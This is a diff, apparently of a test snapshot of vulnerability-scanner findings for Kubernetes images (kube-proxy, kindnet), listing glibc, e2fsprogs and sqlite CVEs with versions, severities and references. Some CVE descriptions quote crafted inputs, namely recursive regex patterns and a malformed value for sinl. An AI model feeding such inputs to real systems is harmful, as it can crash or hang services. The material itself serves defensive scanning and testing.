"https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010025", - "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", + "https://access.redhat.com/security/cve/CVE-2020-10029", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", + "https://linux.oracle.com/cve/CVE-2020-10029.html", + "https://linux.oracle.com/errata/ELSA-2021-0348.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", + "https://security.gentoo.org/glsa/202006-04", + "https://security.netapp.com/advisory/ntap-20200327-0003/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-10029", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The GNU C Library (aka glibc or libc6) before 2.32 could overflow an on-stack buffer during range reduction if an input to an 80-bit long double function contains a non-canonical bit pattern, a seen when passing a 0x5d414141414141410000 value to sinl on x86 targets. This is related to sysdeps/ieee754/ldbl-96/e_rem_pio2l.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "name": "glibc: stack corruption from crafted input in cosl, sinl, sincosl, and tanl functions", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", + "value": "https://avd.aquasec.com/nvd/cve-2020-10029", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "value": "https://access.redhat.com/security/cve/CVE-2020-10029", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "value": "https://linux.oracle.com/cve/CVE-2020-10029.html", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://linux.oracle.com/errata/ELSA-2021-0348.html", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010025", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9192", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-9192", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2019-9192", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9192", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9192", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "value": "https://security.gentoo.org/glsa/202006-04", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "value": "https://security.netapp.com/advisory/ntap-20200327-0003/", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-4416-1", + }, + { + "type": "URL", + "value": "https://usn.ubuntu.com/4416-1/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-10029", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "2.31-13+deb11u4", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3999", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-27618", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", - "https://access.redhat.com/security/cve/CVE-2021-3999", - "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", - "https://linux.oracle.com/cve/CVE-2021-3999.html", - "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "https://access.redhat.com/security/cve/CVE-2020-27618", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", + "https://linux.oracle.com/cve/CVE-2020-27618.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", - "https://security-tracker.debian.org/tracker/CVE-2021-3999", - "https://security.netapp.com/advisory/ntap-20221104-0001/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210401-0006/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2021-3999", - "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "https://ubuntu.com/security/notices/USN-5768-1", + "https://www.cve.org/CVERecord?id=CVE-2020-27618", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", ], }, "category": "Vulnerability", - "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid multi-byte input sequences in IBM1364, IBM1371, IBM1388, IBM1390, and IBM1399 encodings, fails to advance the input state, which could lead to an infinite loop in applications, resulting in a denial of service, a different vulnerability from CVE-2016-10228.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", + "name": "glibc: iconv when processing invalid multi-byte input sequences fails to advance the input state, which could result in an infinite loop", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3999", - }, - { - "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "value": "https://avd.aquasec.com/nvd/cve-2020-27618", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3999", + "value": "https://access.redhat.com/security/cve/CVE-2020-27618", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "value": "https://linux.oracle.com/cve/CVE-2020-27618.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "value": "https://security.netapp.com/advisory/ntap-20210401-0006/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://ubuntu.com/security/notices/USN-5768-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-27618", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2010-4756", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ "http://cxib.net/stuff/glob-0day.c", "http://securityreason.com/achievement_securityalert/89", @@ -77712,7 +79643,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", "references": [ @@ -77758,10 +79689,10 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2018-20796", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ "http://www.securityfocus.com/bid/107160", "https://access.redhat.com/security/cve/CVE-2018-20796", @@ -77775,7 +79706,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ @@ -77821,10 +79752,10 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2019-1010022", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ "https://access.redhat.com/security/cve/CVE-2019-1010022", "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", @@ -77837,7 +79768,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "glibc: stack guard protection bypass", "references": [ @@ -77879,10 +79810,10 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2019-1010023", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ "http://www.securityfocus.com/bid/109167", "https://access.redhat.com/security/cve/CVE-2019-1010023", @@ -77896,7 +79827,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", "references": [ @@ -77942,10 +79873,10 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2019-1010024", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ "http://www.securityfocus.com/bid/109162", "https://access.redhat.com/security/cve/CVE-2019-1010024", @@ -77960,7 +79891,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "glibc: ASLR bypass using cache of thread stack and heap", "references": [ @@ -78010,10 +79941,10 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2019-1010025", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ "https://access.redhat.com/security/cve/CVE-2019-1010025", "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", @@ -78027,7 +79958,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "glibc: information disclosure of heap addresses of pthread_created thread", "references": [ @@ -78072,6815 +80003,6173 @@ commonly used by applications.", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9192", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-9192", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2019-9192", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9192", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9192", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - }, - { - "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - }, - { - "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1304", - "installedVersion": "1.46.2-2", - "packageName": "libcom-err2", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19126", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8361", - "https://access.redhat.com/security/cve/CVE-2022-1304", - "https://bugzilla.redhat.com/2069726", - "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", - "https://errata.almalinux.org/9/ALSA-2022-8361.html", - "https://errata.rockylinux.org/RLSA-2022:8361", - "https://linux.oracle.com/cve/CVE-2022-1304.html", - "https://linux.oracle.com/errata/ELSA-2022-8361.html", - "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", - "https://ubuntu.com/security/notices/USN-5464-1", - "https://www.cve.org/CVERecord?id=CVE-2022-1304", + "https://access.redhat.com/security/cve/CVE-2019-19126", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", + "https://linux.oracle.com/cve/CVE-2019-19126.html", + "https://linux.oracle.com/errata/ELSA-2020-3861.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", + "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-19126", ], }, "category": "Vulnerability", - "description": "An out-of-bounds read/write vulnerability was found in e2fsprogs 1.46.5. This issue leads to a segmentation fault and possibly arbitrary code execution via a specially crafted filesystem.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "On the x86-64 architecture, the GNU C Library (aka glibc) before 2.31 fails to ignore the LD_PREFER_MAP_32BIT_EXEC environment variable during program execution after a security transition, allowing local attackers to restrict the possible mapping addresses for loaded libraries and thus bypass ASLR for a setuid program.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "e2fsprogs: out-of-bounds read/write via crafted filesystem", + "name": "glibc: LD_PREFER_MAP_32BIT_EXEC not ignored in setuid binaries", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1304", + "value": "https://avd.aquasec.com/nvd/cve-2019-19126", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8361", + "value": "https://access.redhat.com/security/cve/CVE-2019-19126", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1304", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2069726", + "value": "https://linux.oracle.com/cve/CVE-2019-19126.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", + "value": "https://linux.oracle.com/errata/ELSA-2020-3861.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8361.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8361", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1304.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8361.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", }, { "type": "URL", - "value": "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", + "value": "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5464-1", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1304", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19126", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-8457", - "installedVersion": "5.3.28+dfsg1-0.8", - "packageName": "libdb5.3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9192", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", - "https://access.redhat.com/security/cve/CVE-2019-8457", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", - "https://linux.oracle.com/cve/CVE-2019-8457.html", - "https://linux.oracle.com/errata/ELSA-2020-1810.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", - "https://security.netapp.com/advisory/ntap-20190606-0002/", - "https://ubuntu.com/security/notices/USN-4004-1", - "https://ubuntu.com/security/notices/USN-4004-2", - "https://ubuntu.com/security/notices/USN-4019-1", - "https://ubuntu.com/security/notices/USN-4019-2", - "https://usn.ubuntu.com/4004-1/", - "https://usn.ubuntu.com/4004-2/", - "https://usn.ubuntu.com/4019-1/", - "https://usn.ubuntu.com/4019-2/", - "https://www.cve.org/CVERecord?id=CVE-2019-8457", - "https://www.oracle.com/security-alerts/cpuapr2020.html", - "https://www.oracle.com/security-alerts/cpujan2020.html", - "https://www.oracle.com/security-alerts/cpujul2020.html", - "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", - "https://www.sqlite.org/releaselog/3_28_0.html", - "https://www.sqlite.org/src/info/90acdbfce9c08858", + "https://access.redhat.com/security/cve/CVE-2019-9192", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2019-9192", ], }, "category": "Vulnerability", - "description": "SQLite3 from 3.6.0 to and including 3.27.2 is vulnerable to heap out-of-bound read in the rtreenode() function when handling invalid rtree tables.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "sqlite: heap out-of-bound read in function 